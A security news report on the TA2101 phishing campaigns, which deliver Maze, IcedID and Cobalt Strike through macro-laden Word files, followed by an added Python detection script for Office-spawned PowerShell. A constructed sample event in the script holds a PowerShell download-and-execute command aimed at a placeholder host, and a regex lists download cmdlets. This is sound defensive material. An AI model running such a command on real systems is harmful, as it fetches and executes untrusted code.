Proofpoint researchers uncovered a new phishing scheme that targets businesses and organizations in Germany, Italy, and the United States in order to infect their networks with malware. The attacks are orchestrated by a relatively new hacking crew, tracked as TA2101, that appears to be interested in businesses, IT services, manufacturing, and healthcare industries.
The threat actor uses legitimate, licensed penetration-testing tools and backdoor frameworks such as Cobalt Strike and Metasploit for post-exploitation operations. The malware is delivered via spear-phishing emails purporting to come from financial regulatory agencies.
Between October and November 2019, Proofpoint researchers observed several campaigns that used malicious email messages to infect organizations in Germany, Italy, and the United States with backdoors, banking Trojans, or ransomware. In all observed cases the attackers used malicious Word document attachments as the initial vector to compromise the device.
Once opened, the attachment executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs one of the malicious payloads (Maze ransomware, the IcedID trojan or a Cobalt Strike backdoor) onto the victim’s system.
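The chain just described (Office document, macro, PowerShell, download) leaves a recognizable trace in endpoint telemetry: an Office process becoming the parent of a script host whose command line fetches remote content. The following is an added detection example written for this page, not code from Proofpoint or from the report; it assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine), and the four events it runs over are constructed, not real telemetry.

```python
"""Detection logic for the infection chain described above: an Office application
spawning PowerShell (or another script host) whose command line pulls and runs
remote content. The events below are constructed in the shape of Sysmon
process-creation records; nothing here comes from the Proofpoint report."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Cmdlets and switches commonly seen when a macro-launched shell fetches a payload.
DOWNLOAD_INDICATORS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"net\.webclient|invoke-expression|\biex\b|-enc(odedcommand)?\b|hidden)",
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventId": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x.ps1')\""},
    {"EventId": 2,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"EventId": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe"},
    {"EventId": 4,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]


def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return the reasons an event matches the chain; an empty list means no match."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
        cmd = event.get("CommandLine", "")
        hits = sorted({m.group(0).lower() for m in DOWNLOAD_INDICATORS.finditer(cmd)})
        if hits:
            reasons.append("download/obfuscation indicators: " + ", ".join(hits))
    return reasons


def find_suspicious(events):
    """Return [(EventId, reasons)] for every matching event; two reasons means higher confidence."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event["EventId"], reasons))
    return hits


if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

Event 1 is the full chain and yields both reasons; event 4 (Excel spawning cmd.exe with a harmless command) is still reported, because the parent/child pairing alone is worth a look, but with a single reason so it can be triaged at lower priority. Event 2 is deliberately not matched: PowerShell launched from Explorer is ordinary administration, and the rule is scoped to the Office parent this campaign relies on rather than to PowerShell in general.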
In addition to social engineering, the hackers also use stolen branding and lookalike domains of European taxation agencies and other public-facing entities, such as Internet service providers, to make the phishing emails look even more convincing. In the recent campaigns the phishing emails were observed impersonating the following entities:
Bundeszentralamt für Steuern, the German Federal Ministry of Finance,
Agenzia Delle Entrate, the Italian Revenue Agency,
1&1 Internet AG, a German internet service provider,
USPS, the United States Postal Service.
“The increasing sophistication of these lures mirrors improved social engineering and a focus on effectiveness over quantity appearing in many campaigns globally across the email threat landscape,” the researchers concluded.
A more detailed analysis, as well as Indicators of Compromise (IoCs) for the recent campaigns, is available in Proofpoint's blog post.